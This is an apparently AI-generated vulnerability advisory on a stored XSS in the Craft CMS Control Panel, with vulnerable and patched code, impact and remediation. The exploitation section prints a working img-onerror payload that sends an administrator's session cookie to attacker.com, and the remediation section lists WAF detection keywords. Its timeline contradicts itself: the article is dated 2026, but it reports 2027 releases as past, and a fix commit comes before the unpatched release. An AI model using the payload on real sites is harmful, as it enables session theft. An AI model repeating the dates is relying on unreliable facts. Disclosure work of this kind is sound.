CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-2RP4-X2J7-QMCC

GHSA-2RP4-X2J7-QMCC: Stored Cross-Site Scripting via Draft Names in Craft CMS Control Panel

Amit Schendel
Amit Schendel
Senior Security Researcher

Aug 7, 2026·6 min read·11 visits

Executive Summary (TL;DR)

Craft CMS control panel is vulnerable to stored XSS via draft names because Yii's Html::tag helper does not auto-encode input, allowing authenticated authors to execute arbitrary JavaScript in administrators' browsers.

An authenticated stored Cross-Site Scripting (XSS) vulnerability exists in the Control Panel helper of Craft CMS before version 5.10.8. Due to lack of HTML entity encoding within the elementLabelHtml method, unescaped draft names are rendered directly into administrative interfaces.

Vulnerability Overview

Craft CMS is a widely used PHP-based content management system developed to create tailored digital experiences. Its administrative interface, known as the Control Panel, exposes a substantial attack surface via user-controlled parameters that populate listings, cards, and metadata grids. In particular, the system represents state variations of elements using small visual badges or chips to help editors identify entries in active editing stages.

A stored Cross-Site Scripting (XSS) vulnerability identified as GHSA-2RP4-X2J7-QMCC resides in the Control Panel helper component responsible for generating these visual labels. The flaw lies within the private method elementLabelHtml located in the src/helpers/Cp.php helper class. The method fails to sanitize user-supplied draft names prior to outputting them inside the administrative interface.

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). Because the payload persists in the database and executes inside the sessions of other Control Panel users, including administrators, the risk of escalation is significant. Any authenticated user with access to draft creation can inject arbitrary scripts to compromise highly privileged administrative sessions.

Root Cause Analysis

The technical root cause of GHSA-2RP4-X2J7-QMCC is the lack of proper encoding when rendering the $element->draftName property within the administrative template helper. The draft name property holds a string representation supplied by the content editor when saving a draft. Because this string is fully controlled by the client, it is classified as an untrusted data source.

The vulnerability manifests when the application attempts to build the HTML string for the draft state badge. To construct the container tag, the helper class calls a helper method from the underlying framework: Html::tag('span', $content, $options). This method is a direct wrapper around Yii 2 framework's yii\helpers\Html::tag() function.

In the Yii 2 framework, the $content parameter passed to the tag() helper is not automatically HTML-encoded. This design decision allows developers to pass pre-built, nested HTML nodes into container elements. Consequently, when the raw, unescaped $element->draftName value is passed as the content parameter, any HTML markup within the string persists intact within the generated template and is rendered directly inside the document object model.

Code Analysis

Analyzing the unpatched implementation of src/helpers/Cp.php reveals how the unescaped input enters the rendering pipeline. The vulnerability is located inside the elementLabelHtml function around line 1150:

// show the draft name?
if (($config['showDraftName'] ?? true) && $element->getIsDraft() && !$element->isProvisionalDraft && !$element->getIsUnpublishedDraft()) {
    /** @var DraftBehavior&ElementInterface $element */
    $content .= Html::tag('span', $element->draftName ?: Craft::t('app', 'Draft'), [
        'class' => 'context-label',
    ]);
}

In this implementation, the code evaluates if the element is a draft, ensures it is neither provisional nor unpublished, and appends a span element. The second argument of Html::tag evaluates directly to the unescaped $element->draftName if present. If an attacker inputs <script>alert(1)</script> as the draft name, the server outputs <span class="context-label"><script>alert(1)</script></span>.

The official patch modified this block to explicitly encode the input variable:

// show the draft name?
if (($config['showDraftName'] ?? true) && $element->getIsDraft() && !$element->isProvisionalDraft && !$element->getIsUnpublishedDraft()) {
    /** @var DraftBehavior&ElementInterface $element */
    $content .= Html::tag(
        'span',
        $element->draftName ? Html::encode($element->draftName) : Craft::t('app', 'Draft'),
        ['class' => 'context-label'],
    );
}

By routing the property through Html::encode(), special characters are translated into secure entities (e.g., < becomes &lt;). While this fix successfully neutralizes HTML execution inside standard document structures, developers must ensure that provisional or unpublished draft names are not rendered unescaped in other unpatched classes.

Exploitation Methodology

To execute this exploit, an attacker requires credentials to an account with permissions to edit or create entry drafts, such as an external contributor or standard content author. The attack is structured to exploit the implicit trust placed in draft parameters.

First, the attacker logs into the Control Panel and navigates to an entry interface. They create a draft and configure its name to include a typical image-based injection payload: <img src=x onerror="fetch('https://attacker.com/exfil?c=' + btoa(document.cookie))">. The database stores this malicious payload in the draft name field.

Second, the administrator logs into the system and requests the global entries directory or dashboard widget. The server invokes the elementLabelHtml helper to generate the listing badges. Because the browser interprets the unescaped payload within the administrator's context, the JavaScript executes, enabling the attacker to harvest the session identifier and bypass security controls.

Impact Assessment

The impact of this stored XSS is elevated due to its location inside the administrative backend of the application. The executed script inherits the full authorizations and session characteristics of the victim. If the victim is an administrator, the attacker gains complete control over the CMS installation.

Actions possible via administrative context execution include the creation of new users with administrator privileges, direct database query execution via exposed utility panels, and modification of system settings. Furthermore, an attacker can disable auditing mechanisms or inject malicious scripts into public-facing templates, establishing a path to compromise site visitors.

The calculated CVSS version 3.1 base score is 8.2 (High). The vector details are CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N. The scope is rated as 'Changed' (S:C) because exploitation allows escaping the limited user space of an editor and running tasks within the administrative security context. Availability is unaffected, as the script does not crash the database or web services.

Remediation & Mitigation

The permanent remediation for GHSA-2RP4-X2J7-QMCC is upgrading the Craft CMS codebase to version 5.10.8 or newer. Upgrades should be conducted via Composer to ensure dependencies and autoload tables update correctly.

If immediate system upgrades are restricted by change-management processes, several temporary defense-in-depth measures are available. Applying a comprehensive Content Security Policy (CSP) restricts the execution of unauthorized inline scripts. The policy should mandate script nonces or restrict execution to trusted origin servers, minimizing the threat of unescaped browser payloads.

Web Application Firewalls (WAFs) can also inspect incoming requests targeting draft updates. Rules should flag and block parameters matching typical execution events (e.g., <script>, onerror=, onload=). However, server-side code correction remains the only definitive resolution to address the root escaping issue.

Official Patches

Craft CMSOfficial fix commit implementing Html::encode inside Cp.php
Craft CMSCraft CMS 5.10.8 release notes details

Fix Analysis (1)

Technical Appendix

CVSS Score
8.2/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Affected Systems

Craft CMS Control Panel

Affected Versions Detail

Product
Affected Versions
Fixed Version
Craft CMS
Craft CMS
< 5.10.85.10.8
AttributeDetail
CWE IDCWE-79
Attack VectorNetwork (AV:N)
CVSS v3.1 Score8.2 (High)
Exploit StatusProof of Concept
Vulnerability TypeStored Cross-Site Scripting (XSS)
Affected Componentsrc/helpers/Cp.php (elementLabelHtml method)

MITRE ATT&CK Mapping

T1204.001User Execution: Malicious Link/Script
Execution
T1562Impair Defenses: Disable or Modify Tools
Defense Evasion
T1078Valid Accounts
Privilege Escalation
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Vulnerability Timeline

Security fix commit 06c799148537ce960f6bc86e162b499947040eda completed by Brandon Kelly.
2026-06-19
Release of Craft CMS 5.10.7 (prior unpatched version).
2027-06-17
Release of Craft CMS 5.10.8 addressing the stored XSS vulnerability.
2027-06-20
Publication of the GitHub Security Advisory GHSA-2RP4-X2J7-QMCC.
2027-06-21

References & Sources

  • [1]GitHub Security Advisory GHSA-2RP4-X2J7-QMCC
  • [2]Official Craft CMS Fix Commit
  • [3]Craft CMS 5.10.8 Release

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•16 minutes ago•CVE-2026-105698
5.4

CVE-2026-105698: Missing Authorization in Deprecated Chat Vertices Endpoints in Langflow

A missing authorization vulnerability in Langflow versions 1.0.0 through 1.10.0 allows authenticated users (and unauthenticated users in versions prior to 1.7.2) to access private workflow structures and execute graph components by targeting deprecated API endpoints.

Amit Schendel
Amit Schendel
1 views•8 min read
•about 1 hour ago•CVE-2026-105697
9.9

CVE-2026-105697: OS Command Injection in Langflow Model Context Protocol Integration

A critical OS command injection vulnerability exists in Langflow's Model Context Protocol (MCP) server integration using stdio transport, allowing unauthenticated remote command execution under default configurations.

Alon Barad
Alon Barad
5 views•5 min read
•about 2 hours ago•CVE-2026-105745
6.7

CVE-2026-105745: Arbitrary Code Execution via Malicious Entrypoint Discovery in Docling base_factory

Docling prior to version 2.131.0 is vulnerable to arbitrary local code execution during module initialization due to incorrect order of operations in its plugin discovery system. Even when the default option to reject external plugins is active, Docling utilizes Pluggy to scan and import entrypoints before performing namespace validation.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 3 hours ago•CVE-2026-105749
6.5

CVE-2026-105749: Unbounded Table Attributes in Docling Backends Leads to Resource Exhaustion

An uncontrolled resource consumption vulnerability exists in the Docling document conversion library. Maliciously structured HTML, JATS, ODS, or BoxNote inputs containing table cells with excessively large 'rowspan' or 'colspan' attribute values trigger algorithmic complexity conditions. This allows unauthenticated remote attackers to initiate resource exhaustion states, crashing or hanging the target document processing pipeline while bypassing configured timeouts.

Amit Schendel
Amit Schendel
9 views•6 min read
•about 4 hours ago•CVE-2026-105748
4.3

CVE-2026-105748: Local File Inclusion and Arbitrary File Disclosure in Docling Document Parser

A Local File Inclusion (LFI) and Arbitrary File Disclosure vulnerability exists in Docling and Docling Slim versions >= 2.16.0 up to 2.131.0. When parsing serialized DoclingDocument structures using the JSON input format, the backend fails to restrict image URI schemes, allowing remote attackers to retrieve local files and verify path existence on the host system during embedded document export.

Amit Schendel
Amit Schendel
6 views•5 min read
•about 5 hours ago•CVE-2026-105744
7.5

CVE-2026-105744: Arbitrary File Read and Remote Code Execution in Docling Tectonic Engine

Docling, a tool for parsing and processing diverse document formats, is vulnerable to arbitrary file read, arbitrary file write, and potential remote code execution (RCE) in versions 2.94.0 through 2.131.0. The vulnerability occurs when applications configure Docling to use the Tectonic engine for rendering TikZ diagrams into images. Because the compilation did not restrict hazardous TeX primitives or sandbox the environment, an attacker can supply crafted documents containing malicious TikZ definitions to access or modify local files and execute arbitrary commands under the privileges of the processing application.

Amit Schendel
Amit Schendel
8 views•7 min read